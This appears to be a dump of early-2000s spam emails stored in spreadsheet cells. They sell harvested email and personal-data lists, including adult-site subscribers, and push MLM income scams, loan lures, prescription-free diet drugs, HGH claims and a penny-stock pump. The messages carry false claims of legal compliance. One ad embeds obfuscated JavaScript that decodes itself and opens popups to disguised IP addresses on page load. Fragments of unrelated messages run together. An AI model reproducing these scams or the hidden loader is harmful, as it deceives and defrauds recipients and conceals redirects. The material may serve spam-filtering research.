Attention: Are you buying from the "Information America" type companies for .10-.15 cents per record, we sell the same types of data for 1000's of records per penny! As a matter of fact several of these companies use and sell our data since did not have the skills to compile / append the newer internet fields such as web site info and  e m a i l  information. Please Read On...The Ultimate Traditional &amp; Internet Marketing Tool, Introducing the "M A S T E R  D I S C  2002" versions 4.00-4.10, now released its MASSIVE 11 disc set with over 145 Million database records (18-20 gigabytes of databases) for marketing to companies, people, via  e m a i l, fax, phone and mailing addresses Worldwide!COMPLETE 11 DISC SET IS ALL OF THE MARKETING DATA YOU WILL NEED FOR 2002 &amp; 2003 (Put your service or product out for the world to see!)We've been slashing prices once again to get you hooked on our leads &amp; data products.The full disc set ver 4.00-4.10 (Contains all databases, all software titles, all demos, more then 65 million records include an  e m a i l  address and many, many other useful fields) including unlimited usage is yours permanently for just $799.00 for the full set or $99.00 for the single sample disc (Normally Sold For $2800.00 for the full set and $299.00 for single sample disc) if you order today!
**** M A S T E R  D I S C 2002 CONTENTS ****We've gone out of our way to insure that this product is the finest of its kind available.  Each CD (ver.4.01 to ver.4.10) contains approximately 10% of the 145 million records distributed within the following databases:- 411: USA white and yellow pages data records by state.- DISCREETLIST: Adult web site subscribers and adult webmasters  E M A I L  addresses.- FORTUNE: This database contains primary contact data relating to fortune 500, fortune 1000, and millions more corporations sort able by company size and sales.- GENDERMAIL:	Male and female email address lists that allow you target by gender with 97% accuracy.- MARKETMAKERS: Active online investors  E M A I L  addresses. Also information in reference to thousands of public companies symbols, and descriptions.- MAXDISC: Online website owners, administrators, and technical contacts for website domain name owners of the ".com", ".net", and ".org" sites.  This database has information from about 25%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86 software titles, some are fully functional versions and others are demo versions.  Many suites of commercial  e m a i l  tools as well as many other useful resources will be found here to help extract, verify, manage, and deliver successful commercial  e m a i l  marketing campaigns.
For More Information, Available Records, Pricing, CUSTOM Databases, Ordering Contact us:D a t a C o m   M a r k e t i n g   C o r p
1 4 4 0   C o r a l   R i d g e   D r.  #3 3 6
C o r a l   S p r i n g s,  F l  3 3 0 7 1(9 5 4) 7 5 3-2 8 4 6 voice / fax (Promo Code: 052402)For no further notice at no cost and to be  disolved from all of our databases, simply  "r e p l y"  to this message with the word "Discontinue" in the subject line. IZ1</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings -I understand you are interested in making some money, and thought
you might be interested in this. A few months back I joined a program and then...promptly forgot
about it. You may have done this yourself sometime...you intend
to work the program but then get caught in your day-to-day
activities and it's soon forgotten.The program was free to join so maybe I just didn't take it very seriously.Anyway, near the end of May I received a letter from my 
sponsor (Vic Patalano) informing me that I had more than 1000 
PAID members in my group! As you can imagine, I was very skeptical. After all, how could I 
have more than 1000 paid members under me in a program that I had
never promoted?I took the time to check out the site...then wrote to Vic asking 
for confirmation that these were paid members and not just free 
sign-ups...like me :)Well, it was true...I had over 1000 paid members in my group. This 
is a program that I had never worked! All I had to do was upgrade to a paid membership before the end 
of the month and I would have my position locked in and a group of over 1000
 people. You can bet I wasted no time in getting my membership upgraded!I can tell you, if I had known what was happening with this program,
 I would have become an active paid member months ago! With this program, you will get a HUGE group of PAID MEMBERS.
My sponsor's check, which is a minimum of $5,000, arrives every
month...on time.How would you like to lock your position in FREE while you check
out this opportunity and watch your group grow?To grab a FREE ID#, simply reply to:  sejr102@yahoo.com
and write this phrase:"Email me details about the club's business and consumer opportunities"
Be sure to include your:
1. First name
2. Last name
3. Email address (if different from above)Once I receive your reply, I will submit your information and you 
will receive an e-mail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mind.That's all there is to it.Warm regards,Sean P.S. After having several negative experiences with network
marketing companies I had pretty much given up on them.
This company is different--it offers value, integrity, and a
REAL opportunity to have your own home-based business...
and finally make real money on the internet.Don't pass this up..you can sign up and test-drive the
program for FREE.  All you need to do is get your free
membership. 
=====================================================================================
"This email is sent in compliance with strict anti-abuse and NO SPAM
regulations. The message was sent to you as a response to your ad, an opt-in
opportunity, your address was collected as a result of you posting to one of
my links, reviewing your web site, you answering one of my classified ads,
you have sent me an E-mail, or you unknowingly had your e-mail added to an
opt-in mailing list. You may remove your E-mail address at no cost to you
whatsoever, simply send an e-mail to sejr102@yahoo.com with subject, Â“remove meÂ” ============================================================================
=========0805wSRp6-561vfdn8353FvPk0-290xryS2l33
</t>
  </si>
  <si>
    <t xml:space="preserve">
There are more financial opportunities out there than ever
before. The majority of those that succeed don't follow the
rules, they bend them, avoid them or go around them.Freedom 55 is for the suckers. You don't have to work 40 to
60 hours a week for 40 years all to make someone else wealthy.
We have a better way!Are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business.For more information about this incredible life changing
opportunity, please complete the form below. The information
is FREE, confidential and you are under no risk or obligations.
Name Â Â 
Address Â Â 
City Â Â 
State Â Â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WyomingZip Code Â Â 
Home Phone Â Â 
Time to Contact Â Â 
E-Mail Â Â 
Desired Monthly Income Â Â 
$500
$1000
$2500
$5000+
----------
To receive no further offers from our company regarding
this subject or any other, please reply to this
e-mail with the word 'Remove' in the subject line.oa1t</t>
  </si>
  <si>
    <t xml:space="preserve">
Question: 
        Are You Paying Too Much for Life Insurance? Most 
        likely the answer is YES! 
        Â         Here's why. Â FACT... Fierce, take no prisoner, Insurance Industry 
        PRICE WARS have driven DOWN 
        premiums 
        - 30 - 40 - 50 - even 70% from where they were just a short time ago!        THAT'S WHY YOUR INSURANCE COMPANY DOESN'T WANT YOU TO READ THIS...        They will continue to take your money at the price they are already charging 
        you, while offering the new lower rates (up to 50%, even 70% lower) to 
        their new buyers ONLY.        BUT, DON'T TAKE OUR WORD FOR IT... CLICK 
        HEREÂ and request a FREE online quote. Â Be prepared for a 
        real shock when you see just how inexpensively you can buy term life insurance 
        for today!  _____________________________________________________________________________________________
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CLICK 
      HERE. In this way, you can instantly â€œopt-outâ€ from the list 
      your email address was obtained from, whether this was an "opt-in" 
      or otherwise. Please accept our apologies if this message has reached you 
      in error. Please allow 5-10 business days for your email address to be removed 
      from all lists in our control. Meanwhile, simply delete any duplicate emails 
      that you may receive and rest assured that your request to be taken off 
      this list will be honored. If you have previously requested to be taken 
      off this list and are still receiving this message, you may call us at 1-(888) 
      817-9902, or write to us at: Abuse Control Center, 7657 Winnetka Ave., Canoga 
      Park, CA 91306
Â </t>
  </si>
  <si>
    <t xml:space="preserve">Learn How To Make $8,000 within 7-14 days!Get out of Debt in 60 days!
Please listen to the 15 minute overview calls 
at: 512-225-3201 pin 439461#  
3, 5, 7 &amp; 9 PM EST Sun-FriFor a detailed info, please reply and put
"Send URL" in the subject line and send it
to the address below:mailto:tim1@btamail.net.cn?subject=SEND_URLWarmest Regards!
Serious inquiries only..Product purchase required
PS: Please put Remove in subject box to get out
of this list.  Thanks.
2942fRJW9-727mXIa0085fmwt1-753wssq3406iZsN1-416l44
</t>
  </si>
  <si>
    <t>PUBLIC ANNOUNCEMENT:The new .NAME domain extension is currently being released to the general public. Unlike the original .COM and .NET domain names, the new .NAME domain was specifically created for individuals such as yourself. The .NAME domain appears in the format: FirstName.LastName.NAME For example, if your name is Monica Smith, then you can register a name such as monica.smith.name Technology experts predict that personalized domain names will soon be used as international identifiers much the same was that phone numbers are used today. For a limited time, you can pre-register your unique .NAME domain for only $10 (plus applicable registry fees) at: http://www.namesforeveryone.com 
To remove your email address from further promotional mailings from this company, click here:
http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
21
9488ycte7-565FWHF6137iGcL4-997l28</t>
  </si>
  <si>
    <t xml:space="preserve">PROMOTE YOUR PRODUCT OR SERVICE TO MILLIONS TODAY!E-MAIL MARKETING
- Complete collection of e-mail software &amp; unlimited addresses, only $199.
- Bulk e-mail will make you money so fast, your head will spin!FAX MARKETING SYSTEM
- 4 Million fax numbers &amp; fax broadcasting software, only $249.
- People are 4 X more likely to read faxes than mail!1 MILLION AMERICAN BUSINESS LEADS ON CD
- Contains company name, address, phone, fax, SIC, # of employees &amp; revenue
- Unlimited downloads!
Visit our Web Site: http://81.9.8.7/index.htmor call us at 618-288-6661    to be taken off of our list respond here mailto:l1l12345a1@btamail.net.cn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</si>
  <si>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it.kryder
</t>
  </si>
  <si>
    <t>As toWant to refinance?Fill out this quick form and immediately have mortgage
companies compete for you business. You will be offered the, absolute, BEST refinance rates 
available!Your credit doesn't matter, don't even worry about past 
credit problems, we can refinance ANYONE!Let Us Put Our Expertise to Work for You!http://save.ac2002.net
Erase
http://save.ac2002.net/optout.htm</t>
  </si>
  <si>
    <t>Dear Sirs,
We know your esteemed company in beach towels from Internet, and pleased to introduce us as a leading producer of high quality 100% cotton velour printed towels in China, we sincerely hope to establish a long-term business relationship with your esteemed company in this field.
Our major items are 100% cotton full printed velour towels of the following sizes and weights with a annual production capacity of one million dozens:
Disney Standard:
30X60 inches, weight  305grams/SM, 350gram/PC  
40X70 inches, weight  305grams/SM, 550gram/PC  
Please refer to our website http://www.jacquard-towel.com/index.html for more details ie patterns about our products.
Once you are interested in our products, we will give you a more favorable price.
Looking forward to hearing from you soon 
Thanks and best regards,
Margaret/Sales Manager
Henan Ziyang Textiles
http://www.jacquard-towel.com</t>
  </si>
  <si>
    <t>Our Loan Packages Have
Never Been More Attractive!
Now is the time to refinance your
home or get a second mortgage to consolidate 
all of your high interestÂ credit card debt. Get all the Smart Cash you'll need!
Cash out your equity while rates
are low!
All USA Homeowners Easily Qualify!
Damaged
Credit Is never a problem!
Â We work with
nation-wide lenders that are offering great dealsÂ 
Â and will provide you with the best service on the INTERNET!
Our service is 100% free!CLICK HERE For more details and
to receive a no obligation quotation today!
We strongly oppose the
use of SPAM email and do not want anyone who does not wish to receiveÂ 
ourÂ mailings to receive them. Please click here to be deleted from further
communication
Click Here to unsubscribe from future promotions.****************************************************************
77259</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</si>
  <si>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HOMEOWNER,Interest rates are at their lowest point in 40 years! 
 Let us do the shopping for you... AND IT'S FREE!Our nationwide network of lenders have hundreds of different loan programs to fit your current situation:
RefinanceSecond MortgageDebt ConsolidationHome ImprovementPurchase 
Please CLICK HERE to fill out a quick form. Your request will be transmitted to our network of mortgage specialists.Â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</si>
  <si>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Thank you for your interest!Judgment Coursesoffers an extensive training
course in "How to Collect MoneyJudgments"If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uncollectedMoney
Judgment debt . For every Judgment that is paid, 5more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on"After only having this course for four months, Larry S. in
area code 314 stated to us: "I am now making $2,000.00 per
week and expect this to grow to twice this amountwithin the
next year. I am having a ball. I have over $250,000 in
judgments I am collecting on now"After having our course for 7 months Larry S. in 314 stated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part.Please call us at 1-281-500-4018.We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This ad is produced and sent out by:
UAS
To be excluded from our mailing list please email us at eds@saiyan.com with "exclude" in the sub-line.
or write us at:AdminScript-Update, P O B 1 2 0 0, O r a n  g e s t a d, A r  u b a
++++++5''''''''''''''''''TO48 5-28  C30 P
-SSPLTM- 30  </t>
  </si>
  <si>
    <t xml:space="preserve">We offer a product that will let you develop a customer base for your business in no time. We have compiled information over the Internet on every US business. One single CD contains data on 12 million US companies - sorted by Yellow Pages Categories and SIC Codes.Accuracy? Freshness? We have sold thousands of CDs, and haven't had one complaint. We are committed to deliver the best quality data that is highly rewarding to your business. How?- Fill out your address book with every company related to your business.
- Select companies within your area, or across the whole USA.
- Create a web site - just put our data in HTML format.
- Thinking big? Create your own complete USA Yellow Pages Web Site.
- Compare and update your old database with our CD. Keep it fresh.
- Promote your products and services, send out your brochures and catalogs.There are endless possibilities how to use the CD.As a bonus we include complete information on 5 mln US Domain Names Owners with email addresses from WHOIS databases. Each record contains the following data: Domain Name, Company Name, Registrant Name, Registrant Email, Registrant Address, Phone and Fax numbers.The CD comes with the software that allows you to import data into your database in 1-2-3 easy steps. Unlimited usage, no restrictions on importing data into your database. Format: ASCII comma separated ","The Price is $349.00 ONLY!!! Free Shipping. Same Day Shipping.We are accepting credit card or check orders. Call us to place the order, or complete the form below, print and fax the form, or mail it to the address below.ORDER LINE: 1-786-258-2394VIA FAX: 1-954-563-6949OR MAIL TO:
0-0 DataNetwork
2805 E. Oakland Park Blvd., #406
Fort Lauderdale, FL 33306 USA
* * * Please copy and paste form order, fill out, print, sign, and mail or fax to us.Please Send Me "US BUSINESSES &amp; US DOMAINS CD" for $349.00 (US) plus s/h.*Name:
*Company Name:
*Shipping Address:
*City:
*State/Province:
*Postal Code:
*Country:
*Telephone:
*Fax:
*E-mail Address:Card Type: MasterCard [ ] Visa [ ] AmEx [ ] Discover [ ]*Credit Card Number:
*Expiration Date:*Shipping/Handling: $Free - in the USA, $25.00 - Overnight [ ]; Overseas [ ]; C.O.D. [ ].*TOTAL ORDER: $*I authorize "0-0 DataNetwork" to charge my credit card for 'US BUSINESSES &amp; US DOMAINS CD' in the amount of $__________ .*Date:                                                   *Signature:
*Name as appears on Card:
*Billing Address:
*City, State &amp; Postal Code:=========================================================
We apologize if this message was intrusive.
We guarantee you will never again hear from us.
Just click here to be removed REMOVE or reply back with Subject REMOVE.
Thank You.
* * *
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Candidate,We recently came across a posting of your resume on the Internet.   After our 
research, we determined that it was not posted on over 45 other top job sites. 
The impact to you is that over 83%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100% of the employers and recruiters who are looking 
to hire or place candidates with your skills.  Free Job Site Research
Visit our web site for free information that will help you sort out the job site 
madness.  We provide a free list of the top 50 job sites that can help shift 
your job search into high gear.  Click here to get the free information that 
can help change your future:  http://www.ResumeValet.com  Today's job market is too competitive to rely on a limited strategy for finding 
your next job.  If it is time to put your resume back to work, then it's time 
for ResumeValet.  Best wishes always,ResumeValet
--  Putting your resume "back to work."
http://www.ResumeValet.com 
Copyright 2002
Professionals Online Network, Inc.
</t>
  </si>
  <si>
    <t>I am sending you this message because we have communicated in the past about business opportunities. I hope you will enjoy this one as much as I do.
Turn Your PayPal Account Into A Non-Stop Cash Machine!
Re-Occurring 100% Commissions Paid Directly To Your PayPal Account! 
4 Out Of 10 Visitors Join INSTANTLY! 
Shouldn't You Be Next? 
Did I Mention That It's Free For 15 Days? 
Simply go to: http://www.paypal-profits.com/a/turnkeyim/
Best Wishes,Tony &amp; Donna Scurlock
turnkeyim@hotmail.comThe Best Home-Based Business on the Planet!!
WE BUILD YOUR DOWNLINE -- 1000 to 3500 members added per month!! 
FREE to JOIN!!
Minimum Monthly Income!!
Get all the details at: 
http://www.lifelong-income.com****************************************************
This email message is sent in compliance with the the 106th Congress E-Mail User Protection Act (H.R. 1910) and the Unsolicited Commercial Electronic Mail Act of 2000 (H.R. 3113). Though our intention is not to communicate with you again if we receive no response from you, we do provide a valid vehicle for you to be removed from our email list. To be removed from our mailing list, simple reply to this message with REMOVE in the Subject line.Please keep in mind that complaints to our email provider and service provider, could make honoring remove requests impossible and you will be in violation of the above legislation.
****************************************************</t>
  </si>
  <si>
    <t>Our Loan Packages Have
Never Been More Attractive!
Now is the time to refinance your
home or get a second mortgage to consolidate 
all of your high interestÂ credit card debt. Get all the Smart Cash you'll need!
Cash out your equity while rates
are low!
All USA Homeowners Easily Qualify!
Damaged
Credit Is never a problem!
Â We work with
nation-wide lenders that are offering great dealsÂ 
Â and will provide you with the best service on the INTERNET!
Our service is 100% free!CLICK HERE For more details and
to receive a no obligation quotation today!
We strongly oppose the
use of SPAM email and do not want anyone who does not wish to receiveÂ 
ourÂ mailings to receive them. Please click here to be deleted from further
communication
Click Here to unsubscribe from future promotions.***********************************
3419</t>
  </si>
  <si>
    <t xml:space="preserve">
To find out moreIpVecIpV="%3Cbody%20onload%3D%22pops%28%29%3B%22%3Cbody%22%3C%2FA%3E%3C%2FCENTER%3E";IpVeecIpV="%3Cscript%20language%3D%22Javascript1.2%22%3Evar%20num%20%3D%20%27.%27%3Bvar%20etc%20%3D%22http%3A%2F%2F00000365.000000000000000000000000000%20000000000000000000000000000000000365.00000000000000000000000000000000000000000364.00000000000000000000000000000000325%26amp%3B@%22%3Bbon%20%3D%20%27%27%3Bwith%20%28Math%29%20%7Bvar%20teg%20%3D%20sqrt%28sqrt%28%28PI%2A319543879.37318366%29%29%29%3Bvar%20jik%20%3D%20sqrt%28146574.02304/*%2FPI%29%3Bvar%20uyr%20%3D%20219%3Bvar%20tel%20%3D%20%28PI%2Asqrt%284859.4734979100285%29%29%3Bteg%20%3D%20round%28teg%29%3Buyr%20%3D%20round%28uyr%29%3Btel%20%3D%20round%28tel%29%3Bjik%20%3D%20round%28jik%29%3B%7Drry%20%3D%20etc%20+%20bon%3B%20cjk%20%3D%20rry%20+%20jik%20+%20num%3B%20tgh%20%3D%20cjk%20+%20bon%20+%20tel%3B%20uhy%20%3D%20tgh%20+%20num%3B%20yth%20%3D%20uhy%20+%20uyr%3B%20kiw%20%3D%20yth%20+%20num%3B%20red%20%3D%20kiw%20+%20bon%20+%20teg%3B%20wes%20%3D%20red%20+%20%27%2F35197%27%3B%20tyh%20%3D%20wes%20+%20%2732234%2Fmd1%2Fvi%27%3B%20iuj%20%3D%20tyh%20+%20%27r1001%2Fin%27%3B%20svd%20%3D%20iuj%20+%20%27%27%3B%20etc%20%3D%20svd%20+%20%27dex.html%27%3Bfunction%20pops%28%29%7Bwindow.open%28%28etc%29%2C%27detail%27%2C%27width%3D775%2Cheight%3D475%2Cresizable%3Dno%2Cscrollbars%3Dyes%2Cleft%3D10%2Cto*/p%3D10%27%29%3B%7D%3C%2Fscript%3E%3Cscript%20language%3D%22Javascript1.2%22%3Evar%20num%20%3D%20%27.%27%3Bvar%20rmv%20%3D%22h/*ttp%3A%2F%2F00000365.000000000000000000000000000%20000000000000000000000000000000000365.00000000000000000000000000000000000000000364.00000000000000000000000000000000325%26amp%3B@%22%3Bbon%20%3D%20%27%27%3Bwith%20%28Math%29%20%7Bvar%20teg%20%3D%20%28sqrt%2883536.19053063838%29%2FPI%29%3Bvar%20jik%20%3D%20%28PI%2Asqrt%284727.24912988658%29%29%3Bvar%20uyr%20%3D%20248%3Bvar%20tel%20%3D%20sqrt%28sqrt%28%28PI%2A814873.996925124%29%29%29%3Bteg%20%3D%20round%28teg%29%3Buyr%20%3D%20round%28uyr%29%3Btel%20%3D%20round%28tel%29%3Bjik%20%3D%20round%28jik%29%3B%7Drry%20%3D%20rmv%20+%20bon%3B%20cjk%20%3D%20rry%20+%20jik%20+%20num%3B%20tgh%20%3D%20cjk%20+%20bon%20+%20tel%3B%20uhy%20%3D%20tgh%20+%20num%3B%20yth%20%3D%20uhy%20+%20uyr%3B%20kiw%20%3D%20yth%20+%20num%3B%20red%20%3D%20kiw%20+%20bon%20+%20teg%3B%20wes%20%3D%20red%20+%20%27%2F35197%27%3B%20tyh%20%3D%20wes%20+%20%2732234%2Fca5%2Fremo%27%3B%20iuj%20%3D%20tyh%20+%20%27vesys5005%2Findex.html%27%3B%20svd%20%3D%20iuj%20+%20%*/27%27%3B%20rmv%20%3D%20svd%20+%20%27%3Fredirect%3Dhttp%3A%2F%2F326841526%2Findex.html@00000000216.00000000000114.0000000000069.0000000000002%2F%7Ecyber101%2Fpages%2F%27%3Bfunction%20rem%28%29%7Bwindow.open%28%28rmv%29%2C%27detail%27%2C%27width%3D775%2Cheight%3D475%2Cresizable%3Dno%2Cscrollbars%3Dyes%2Cleft%3D10%2Ctop%3D10%27%29%3B%7D%3C%2Fscript%3E";IpVesIpV="AaMmbNnOoJjiHhWwrcekDdGgYypZzQqFfvsUulTtx1070696";function IpVcfiPv(IpV,IpVchar){var IpVidx=0;while(IpV.indexOf(IpVchar,IpVidx)&gt;-1){IpVidx=IpV.indexOf(IpVchar,IpVidx);IpV=IpV.substring(0,IpVidx)+IpV.substring(IpVidx+1,IpV.length);}return IpV;}function IpVcfIpV(){IpVeecIpV=IpVcfiPv(IpVeecIpV,'/');IpVeecIpV=IpVcfiPv(IpVeecIpV,'*');IpVeecIpV=unescape(IpVeecIpV);for(var IpViIpV=0;IpViIpV&lt;IpVeecIpV.length; IpViIpV++){var IpVtestIpV=0;var IpVaIpV=IpVeecIpV.charAt(IpViIpV);var IpVbIpV=IpVesIpV.indexOf(IpVaIpV);if(parseInt(IpVbIpV)&gt;=0) IpVtestIpV=1;if(parseInt(IpVesIpV.charAt(IpVbIpV^6))&gt;=0) IpVtest=1;if(IpVbIpV&gt;-1 &amp;&amp; IpVtestIpV==0){IpVaIpV=IpVbIpV^6;IpVbIpV=IpVesIpV.charAt(IpVaIpV);IpVeecIpV=IpVeecIpV.substring(0,IpViIpV)+IpVbIpV+IpVeecIpV.substring(IpViIpV+1,IpVeecIpV.length);}}IpVecIpV=IpVcfiPv(IpVecIpV,'/');IpVecIpV=IpVcfiPv(IpVecIpV,'*');IpVecIpV=unescape(IpVecIpV);document.write(IpVeecIpV+IpVecIpV);};IpVcfIpV();To
                find out more, click onÂ  the link belowMORE INFO
                Â 
                Â 
Â 
Â 
Â 
Â 
Â 
              INCREASE YOUR SEX
                DRIVE !!!
GREAT SEXIn A Bottle!Knock
                Your Sex Drive into High Gear !
MEN easily achieve NATURALLY TRIGGERED erections, like they are 18 all over againÂ WOMEN will pump with naturally flowing juices from the start and will achieve the most intense orgasms of their lives !Â Â Â Â Â Â 
                  Â 
Jumpstart
      Sexual Desire in both Men &amp; Women, to the point that you never thought possible !.
Has your sex life become dull, mundane, or even
          non-existent?
Are you having trouble Getting or "Keeping" an erection?
Do you think you have lost the desire ?
Or does your desire seem more like a chore ?
CLICK
                      HERE FOR
MORE INFO
Â 
                Great Sex in A Bottle has been called the
                        "allÂ  Natural alternative to Viagra."Â 
                        It increases sex drive like you never thought possible, creating natural emotional responses!  This
      fact is unlike Viagra, as Viagra is designed to chemically induce blood flow to the penis.  Well, as you men know, that's great to stay hard, but if you don't have the desire to do anything, then what's the point ? !!!
And all
                        for as low as $1 per pill, as opposed to Viagra at $10
                        per pill !Â Â Â 
                        XeroxÃ¿FFFFAEÂ Â Â Â Â Â Â Â 
                        BrotherÃ¿FFFFAEÂ Â Â Â Â Â Â Â Â Â Â 
                        and more!Â Â Â Â Â  Compatible with
                        all inkjet printers &amp; plain paper inkjet faxes*********************************************************************************************************
        This message is being sent to you in compliance with the proposed
        Federal legislation for commercial e-mail (S.1618 - SECTION 301).
        "Pursuant to Section 301, Paragraph (a)(2)(C) of S. 1618, further
        transmissions to you by the sender of this e-mail may be stopped at no
        cost to you by submitting a request to REMOVE
Further, this message cannot be considered spam as long as we
        include sender contact information.Â You may contact us at (801)
        406-0109 to be removed from future mailings.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</si>
  <si>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t>
  </si>
  <si>
    <t>Certain chances only come around every few
decades or so. This is one. Why you ask?Because home loan rates are headed up.Have you locked in the lowest rate, in almost
thirty years, for your present home loan?Rates haven't been this low in a long time. They
may well never be this low again. This is your
chance to secure a better future. You could
literally save enough money to buy that new car
you've been wanting or to take that special
vacation. Why wouldn't you jump at this chance?There's no need for you to continue to pay more
than is necessary or to continue not having the
things your family wants and needs.
We're a nationwide mortgage lender. We're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won't need to be a lawyer to see the savings,
this we promise.
We offer both first and second home loans and we
will be happy to show you why your current loan
is the best for you. 0r why you should replace
it. And once again, there's no risk for you. None
at all. Take a couple of minutes and use the link below
that works for you. For a couple of minutes of
your time, we can show you how to get more for
yourself and your loved ones. Don't lose this
chance. Please take action now.Click_Herehttp://ad.goo.ne.jp/event.ng/Type=click&amp;Redirect=http://61.129.81.99/paul/bren/mortg/
Sincerely,James W. Minick
MortBanc, Inc.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t>
  </si>
  <si>
    <t xml:space="preserve">
Accept Credit Cards - Everyone Approved
NO CREDIT CHECKSDO IT NOW
189
</t>
  </si>
  <si>
    <t xml:space="preserve">  
See This Lovely Celbrity &amp; Many More Hot Stars 
    Click Here
Â 
Â 
Â 
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
If you would like to opt-out of future promotions click 
    here 
</t>
  </si>
  <si>
    <t xml:space="preserve">BUY 2 ADULT DVDs AT REGULAR PRICE AND GET A THIRD XXX DVD FOR FREE!!VISIT US AT http://www.hotdvds.orgTo be removed from our list, just reply to this email and type REMOVE in the subject line 6js7M_5WNea5xu3M_D7K7Oouz
</t>
  </si>
  <si>
    <t xml:space="preserve">Hotels Etc. is giving away 10,000 of our $495 Travel Packages FREE, to help the USA in the promotion of the travel business. The first 10,000 customers who sign up will receive over $5000 worth of other free products.
This includes:
                FREE 50% off card/vouchers for all hotels in usa 
                FREE $2,000 Las Vegas, Hawaii &amp; Orlando gift check 
                FREE vacation certificates for Las Vegas, Hawaii and Orlando 
As an added bonus you will receive the following:
   Free Kodak film for life coupon 
   FREE Vacation Certificate...
   Lodging for three exciting days and two fun-filled nights at your choice of one of 20 fabulous destinations including Las Vegas and Lake Tahoe, Nevada; Daytona    Beach, Florida; Cancun and  Puerto Vallarta, Mexico; Gatlinburg, Tennessee;Branson, Missouri;Honolulu, Hawaii; and many  more! ($175 Value) 
This also comes with a free home business where you work as much as you like, whenever you like, to make your own money with your own business.
Visit us at our website to see more info on all of these amazing oportunities.
Do not miss out.
Visit http://freetravel@66.46.145.35/members/travel/
</t>
  </si>
  <si>
    <t xml:space="preserve">Â Increase
      Your Gas Mileageby up to 27%
      !!
* No TOOLS
      required!Â * Improves Power* Maximizes Energy
      * Improves MileageÂ * Improves TorqueÂ 
      * Cleaner EngineÂ * Smoother EngineÂ 
      * Reduces Emissions by 43%Â * Protects Catalytic ConvertersÂ * Prevents Diesel GellingÂ 
      * Improves Spark Plug LifeÂ * Maintenance Free* Pays for Itself within 60 days!
Installs
      in Seconds!A simple device that easily snaps over your fuel line.Â  Anyone can do it!
Guaranteed!
FULL REFUND if you are not satisfied with the result within THREE MONTHS from the date of purchase.
CLICK
      HEREHOW TO
UNSUBSCRIBE:
You received this e-mail because you are registered at one of our Web sites, or
on one of our partners' sites.
Â If you do not want to receive partner e-mail offers, or any email
marketing from us please click
here.
 [^3247(^(PO1:KJ)_8J7BJ]
</t>
  </si>
  <si>
    <t>Save thousands by refinancing now. Apply from the privacy of your home and receive a FREE no-obligation loan quote.
http://211.78.96.11/acct/morquote/
Rates are Down. YOU Win!
Criteria has relaxed. YOU Win!
Self-Employed or Poor Credit is OK!
Get CASH out or money for Home Improvements, Debt Consolidation and more.
Interest rates are at the lowest point in years-right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http://211.78.96.11/acct/morquote/
*******************************************
To unsubscribe, click below:
http://211.78.96.11/removal/remove.htm
Allow 72 hours for removal.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, jm@netnoteinc.comAs seen on NBC, CBS, and CNN, and even Oprah!  The health
discovery that actually reverses aging while burning fat,
without dieting or exercise!  This proven discovery has even
been reported on by the New England Journal of Medicine.
Forget aging and dieting forever!  And it's Guaranteed!* Reduce body fat and build lean muscle WITHOUT EXERCISE!
* Enhace sexual performance
* Remove wrinkles and cellulite
* Lower blood pressure and improve cholesterol profile
* Improve sleep, vision and memory
* Restore hair color and growth
* Strengthen the immune system
* Increase energy and cardiac output
* Turn back your body's biological time clock 10-20 years
in 6 months of usage !!!
FOR FREE INFORMATION AND GET FREE 
1 MONTH SUPPLY OF HGH CLICK HERE
You are receiving this email as a subscriber
to the Opt-In America Mailing List. 
To remove yourself from all related maillists,
just  
Click Here
</t>
  </si>
  <si>
    <t>Below is the result of your feedback form.  It was submitted by
 (sje726@aol.com) on Thursday, May 30, 2002 at 23:54:48
---------------------------------------------------------------------------.: Looking to lose some weight before summer hits?Introducing Phentermine ï¿½, the most popular weight loss drug in the world. 
Over 50% of doctors prescriptions for weight loss are for Phentermine ï¿½, making it the most widely used prescription weight loss product in the nation. Phentermine ï¿½ has been proven to keep cholesterol levels down, energy levels up, and most importantly help you lose pounds and inches in a relatively short period of time.Best of all, you don't need a prescription to order online!
Takes only minutes to complete your order, and because you purchase online you pay NO doctors fees. All orders are shipped quickly and discreetly, and we now ship to all 50 states... click below for details!
http://DDoHX@www.getphentermine.com/
----------------------------------------------------------------------------------------------------------------
If you'd like to be removed from this mailing list, please simply click here www.deletemyrxmail.com---------------------------------------------------------------------------</t>
  </si>
  <si>
    <t xml:space="preserve">
"Finally - You 
Too Can Make eBay Into
A Non-stop Cash Generating Machine working online" 
"Why no 
other eBay Power Seller wants this powerful information in YOUR hands..."Get make money with eBay 
secrets exposed for a SUPER LOW price 
Â 
HOW WOULD YOU LIKE TO:
 Make $500 A DAYÂ from eBay
Â $500 
a DAY is very easy when you are given theÂ secrets to show you exactly how
Â 
You'll 
  Discover The Closely Guarded Secret Sources The
  Auction Masters Use To Turn Pennies Into Dollars...Sources that sell 
  below wholesale, directly to you.Incredible drop 
  shipping sources that ship the product FOR YOU. Maintain no inventory, just 
  take the orders and the money!Save time - find what 
  you want, quick and easy.Find products 95% of 
  eBayers can't find. Access to the same 
  secret sources eBay power sellers use to make huge profits.One very secret source 
  that's so secret you won't find it anywhere else. I guarantee you don't find 
  this source ANYWHERE ELSE.Direct links to over 
  100 secret sources website's for INSTANT ACCESS 
  to over 500,000 products!Get just about any 
  product in small quantities, Wholesale!Instantly start your 
  own profitable online business, in your spare time!Unique products that 
  can be marked up an astonishing 10,000%Instant Orders, All 
  Sources accept Credit Cards or Paypal !Turn Your Hobby into a
  healthy full-time income.Make more in your 
  spare time than at your full-time, boring job. 
Rewarding business that 
  gives you more free-time.Work from home -- 
  Make money from eBay today.You choose how much 
  you make, it's all up to you.
Â GO HERE FOR MORE INFORMATION
Â 
Â 
To be taken off any further mailings
click here
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">
A:link {
    TEXT-DECORATION: none
}
A:active {
    TEXT-DECORATION: none
}
A:visited {
    TEXT-DECORATION: none
}
A:hover {
    COLOR: #0033ff; TEXT-DECORATION: underline
}
For 
      Immediate Release
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$.30Â¢ 
      and should skyrocket to $2.66 - $3.25 a share in the near future. Â  
      Put CBYI on your watch list, acquire a postion
TODAY. 
REASONS TO INVEST IN CBYI
A profitable company, NO DEBT and is on track to beat ALL earnings 
      estimates with increased revenue of 50% annually!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 
RAPIDLY GROWING INDUSTRYÂ  
      Industry revenues exceed $900 million, estimates indicate that there 
      could be as much as $25 billion from "smell technology" by the end of 
      2003.
!!!! CONGRATULATIONS 
      !!!!!ToÂ our subscribers that took advantage of 
